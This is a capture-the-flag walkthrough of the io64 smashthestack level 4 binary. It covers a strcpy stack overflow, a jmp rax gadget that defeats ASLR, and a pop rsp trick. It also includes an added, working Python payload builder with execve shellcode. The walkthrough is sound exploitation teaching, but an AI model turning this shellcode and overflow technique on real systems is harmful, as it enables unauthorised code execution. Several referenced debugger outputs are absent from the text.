[io64][smashthestack] level4: stack smashing… at last !

In this level, we're finally going to exploit the binary:

As you can see, no bounds checking is done at all on argv[1]: a long enough string overwrites the saved return address of the dobug function.

let’s try it and see what happens on the stack, first right before the call to strcpy:

Now that we’ve located the return address, let’s see what happens after the call to strcpy, notice the return address at 0x7ffcfc605868, and the buffer address is stored in rax and rdi (0x7ffcfc605850), this means we only need to insert 24 bytes of “A” before overwriting the return address.

As expected, the return address is overwritten, but now we need to figure out which address to store there. We can't just provide the address of the stack buffer, because ASLR is enabled and the stack moves on every run.

Let's see which registers changed, and which didn't:

Good news: rax and rdi did not change! We can look for a gadget that jumps to rax or rdi. Radare2 provides a command for that 🙂

Perfect! We found some code which jumps directly to rax (a jmp rax gadget) at 0x00600477. Since that address is in the binary itself rather than on the stack, it stays the same under ASLR.

This will be the value we’ll overwrite the return address with.

Now all we need to do is write a shellcode of at most 24 bytes (the size of the buffer) in order to get a shell, or just dump the /home/level5/.pass file.

But first let’s test our JOP:

Neat! But there is still one potential problem: once dobug returns, rsp points just above our buffer, so any push in the shellcode would overwrite the shellcode itself. We need a way to move rsp somewhere far from our shellcode without spending too many bytes. Let's look at our registers and at the stack:

Luckily, the stack contains an address far from our shellcode: a simple pop rsp (0x5c, only one byte!) will do the trick, since it loads the qword at the top of the stack into rsp.

Now we need a 23-byte shellcode to go after the pop rsp… found one here
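Putting the whole chain together, here is an added payload builder (example code, not from the original post) that lays out argv[1] as described: the one-byte pop rsp, the shellcode, NOP padding up to the return address, and the jmp rax address. The shellcode bytes are a widely circulated 23-byte x86-64 execve("/bin//sh") stub and are an assumption, since the shellcode the post links to is not reproduced on the page; the addresses are the ones shown above, and the binary name level4 in the usage note is assumed. It also enforces the two things strcpy imposes on us: no NUL byte anywhere in the payload, and only the non-zero low bytes of the gadget address get copied.

```python
import struct
import sys

# Addresses observed in the post's gdb session. Stack addresses are
# ASLR-randomised, so only their difference is meaningful.
BUF_ADDR = 0x7ffcfc605850   # start of the strcpy destination, also left in rax/rdi
RET_ADDR = 0x7ffcfc605868   # saved return address of dobug
JMP_RAX = 0x600477          # "jmp rax" gadget found with radare2 (non-PIE binary, fixed)

# One-byte "pop rsp": loads the qword at the top of the stack into rsp, moving
# the stack far away from the shellcode before the shellcode's own pushes run.
POP_RSP = b"\x5c"

# Assumption: a widely circulated 23-byte execve("/bin//sh") shellcode, not
# necessarily the one the post links to. It contains no NUL bytes.
SHELLCODE_23 = bytes([
    0x48, 0x31, 0xf6,                                            # xor  rsi, rsi     (argv = NULL)
    0x56,                                                        # push rsi          (NUL terminator for the path)
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68,  # mov  rdi, "/bin//sh"
    0x57,                                                        # push rdi          (path now on the stack)
    0x54,                                                        # push rsp
    0x5f,                                                        # pop  rdi          (rdi -> "/bin//sh\0")
    0x6a, 0x3b,                                                  # push 0x3b
    0x58,                                                        # pop  rax          (rax = SYS_execve)
    0x99,                                                        # cdq               (rdx = envp = NULL)
    0x0f, 0x05,                                                  # syscall
])


def overflow_offset(buf_addr, ret_addr):
    """Number of bytes to write before the saved return address is reached."""
    return ret_addr - buf_addr


def build_payload(shellcode=SHELLCODE_23, gadget=JMP_RAX,
                  offset=overflow_offset(BUF_ADDR, RET_ADDR)):
    """Lay out argv[1] as [pop rsp][shellcode][NOP pad][gadget address]."""
    body = POP_RSP + shellcode
    if len(body) > offset:
        raise ValueError(f"shellcode too long: {len(body)} > {offset} bytes available")
    body = body.ljust(offset, b"\x90")  # NOPs are harmless: execution starts at pop rsp

    # strcpy stops at the first NUL and argv strings cannot contain one, so only
    # the non-zero low bytes of the little-endian address can be copied. The high
    # bytes of the saved return address are left untouched; for a caller inside a
    # non-PIE binary mapped at 0x400000 they are already zero, which is what we want.
    addr = struct.pack("<Q", gadget).rstrip(b"\x00")

    payload = body + addr
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


if __name__ == "__main__":
    # Emit raw bytes so the shell can pass them as argv[1].
    sys.stdout.buffer.write(build_payload())
```

Usage (binary name assumed): `./level4 "$(python3 exploit.py)"`. The resulting payload is 27 bytes: 24 bytes of code filling the buffer, then the three non-zero bytes of 0x600477.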

Let’s try it:

Almost too easy 🙂
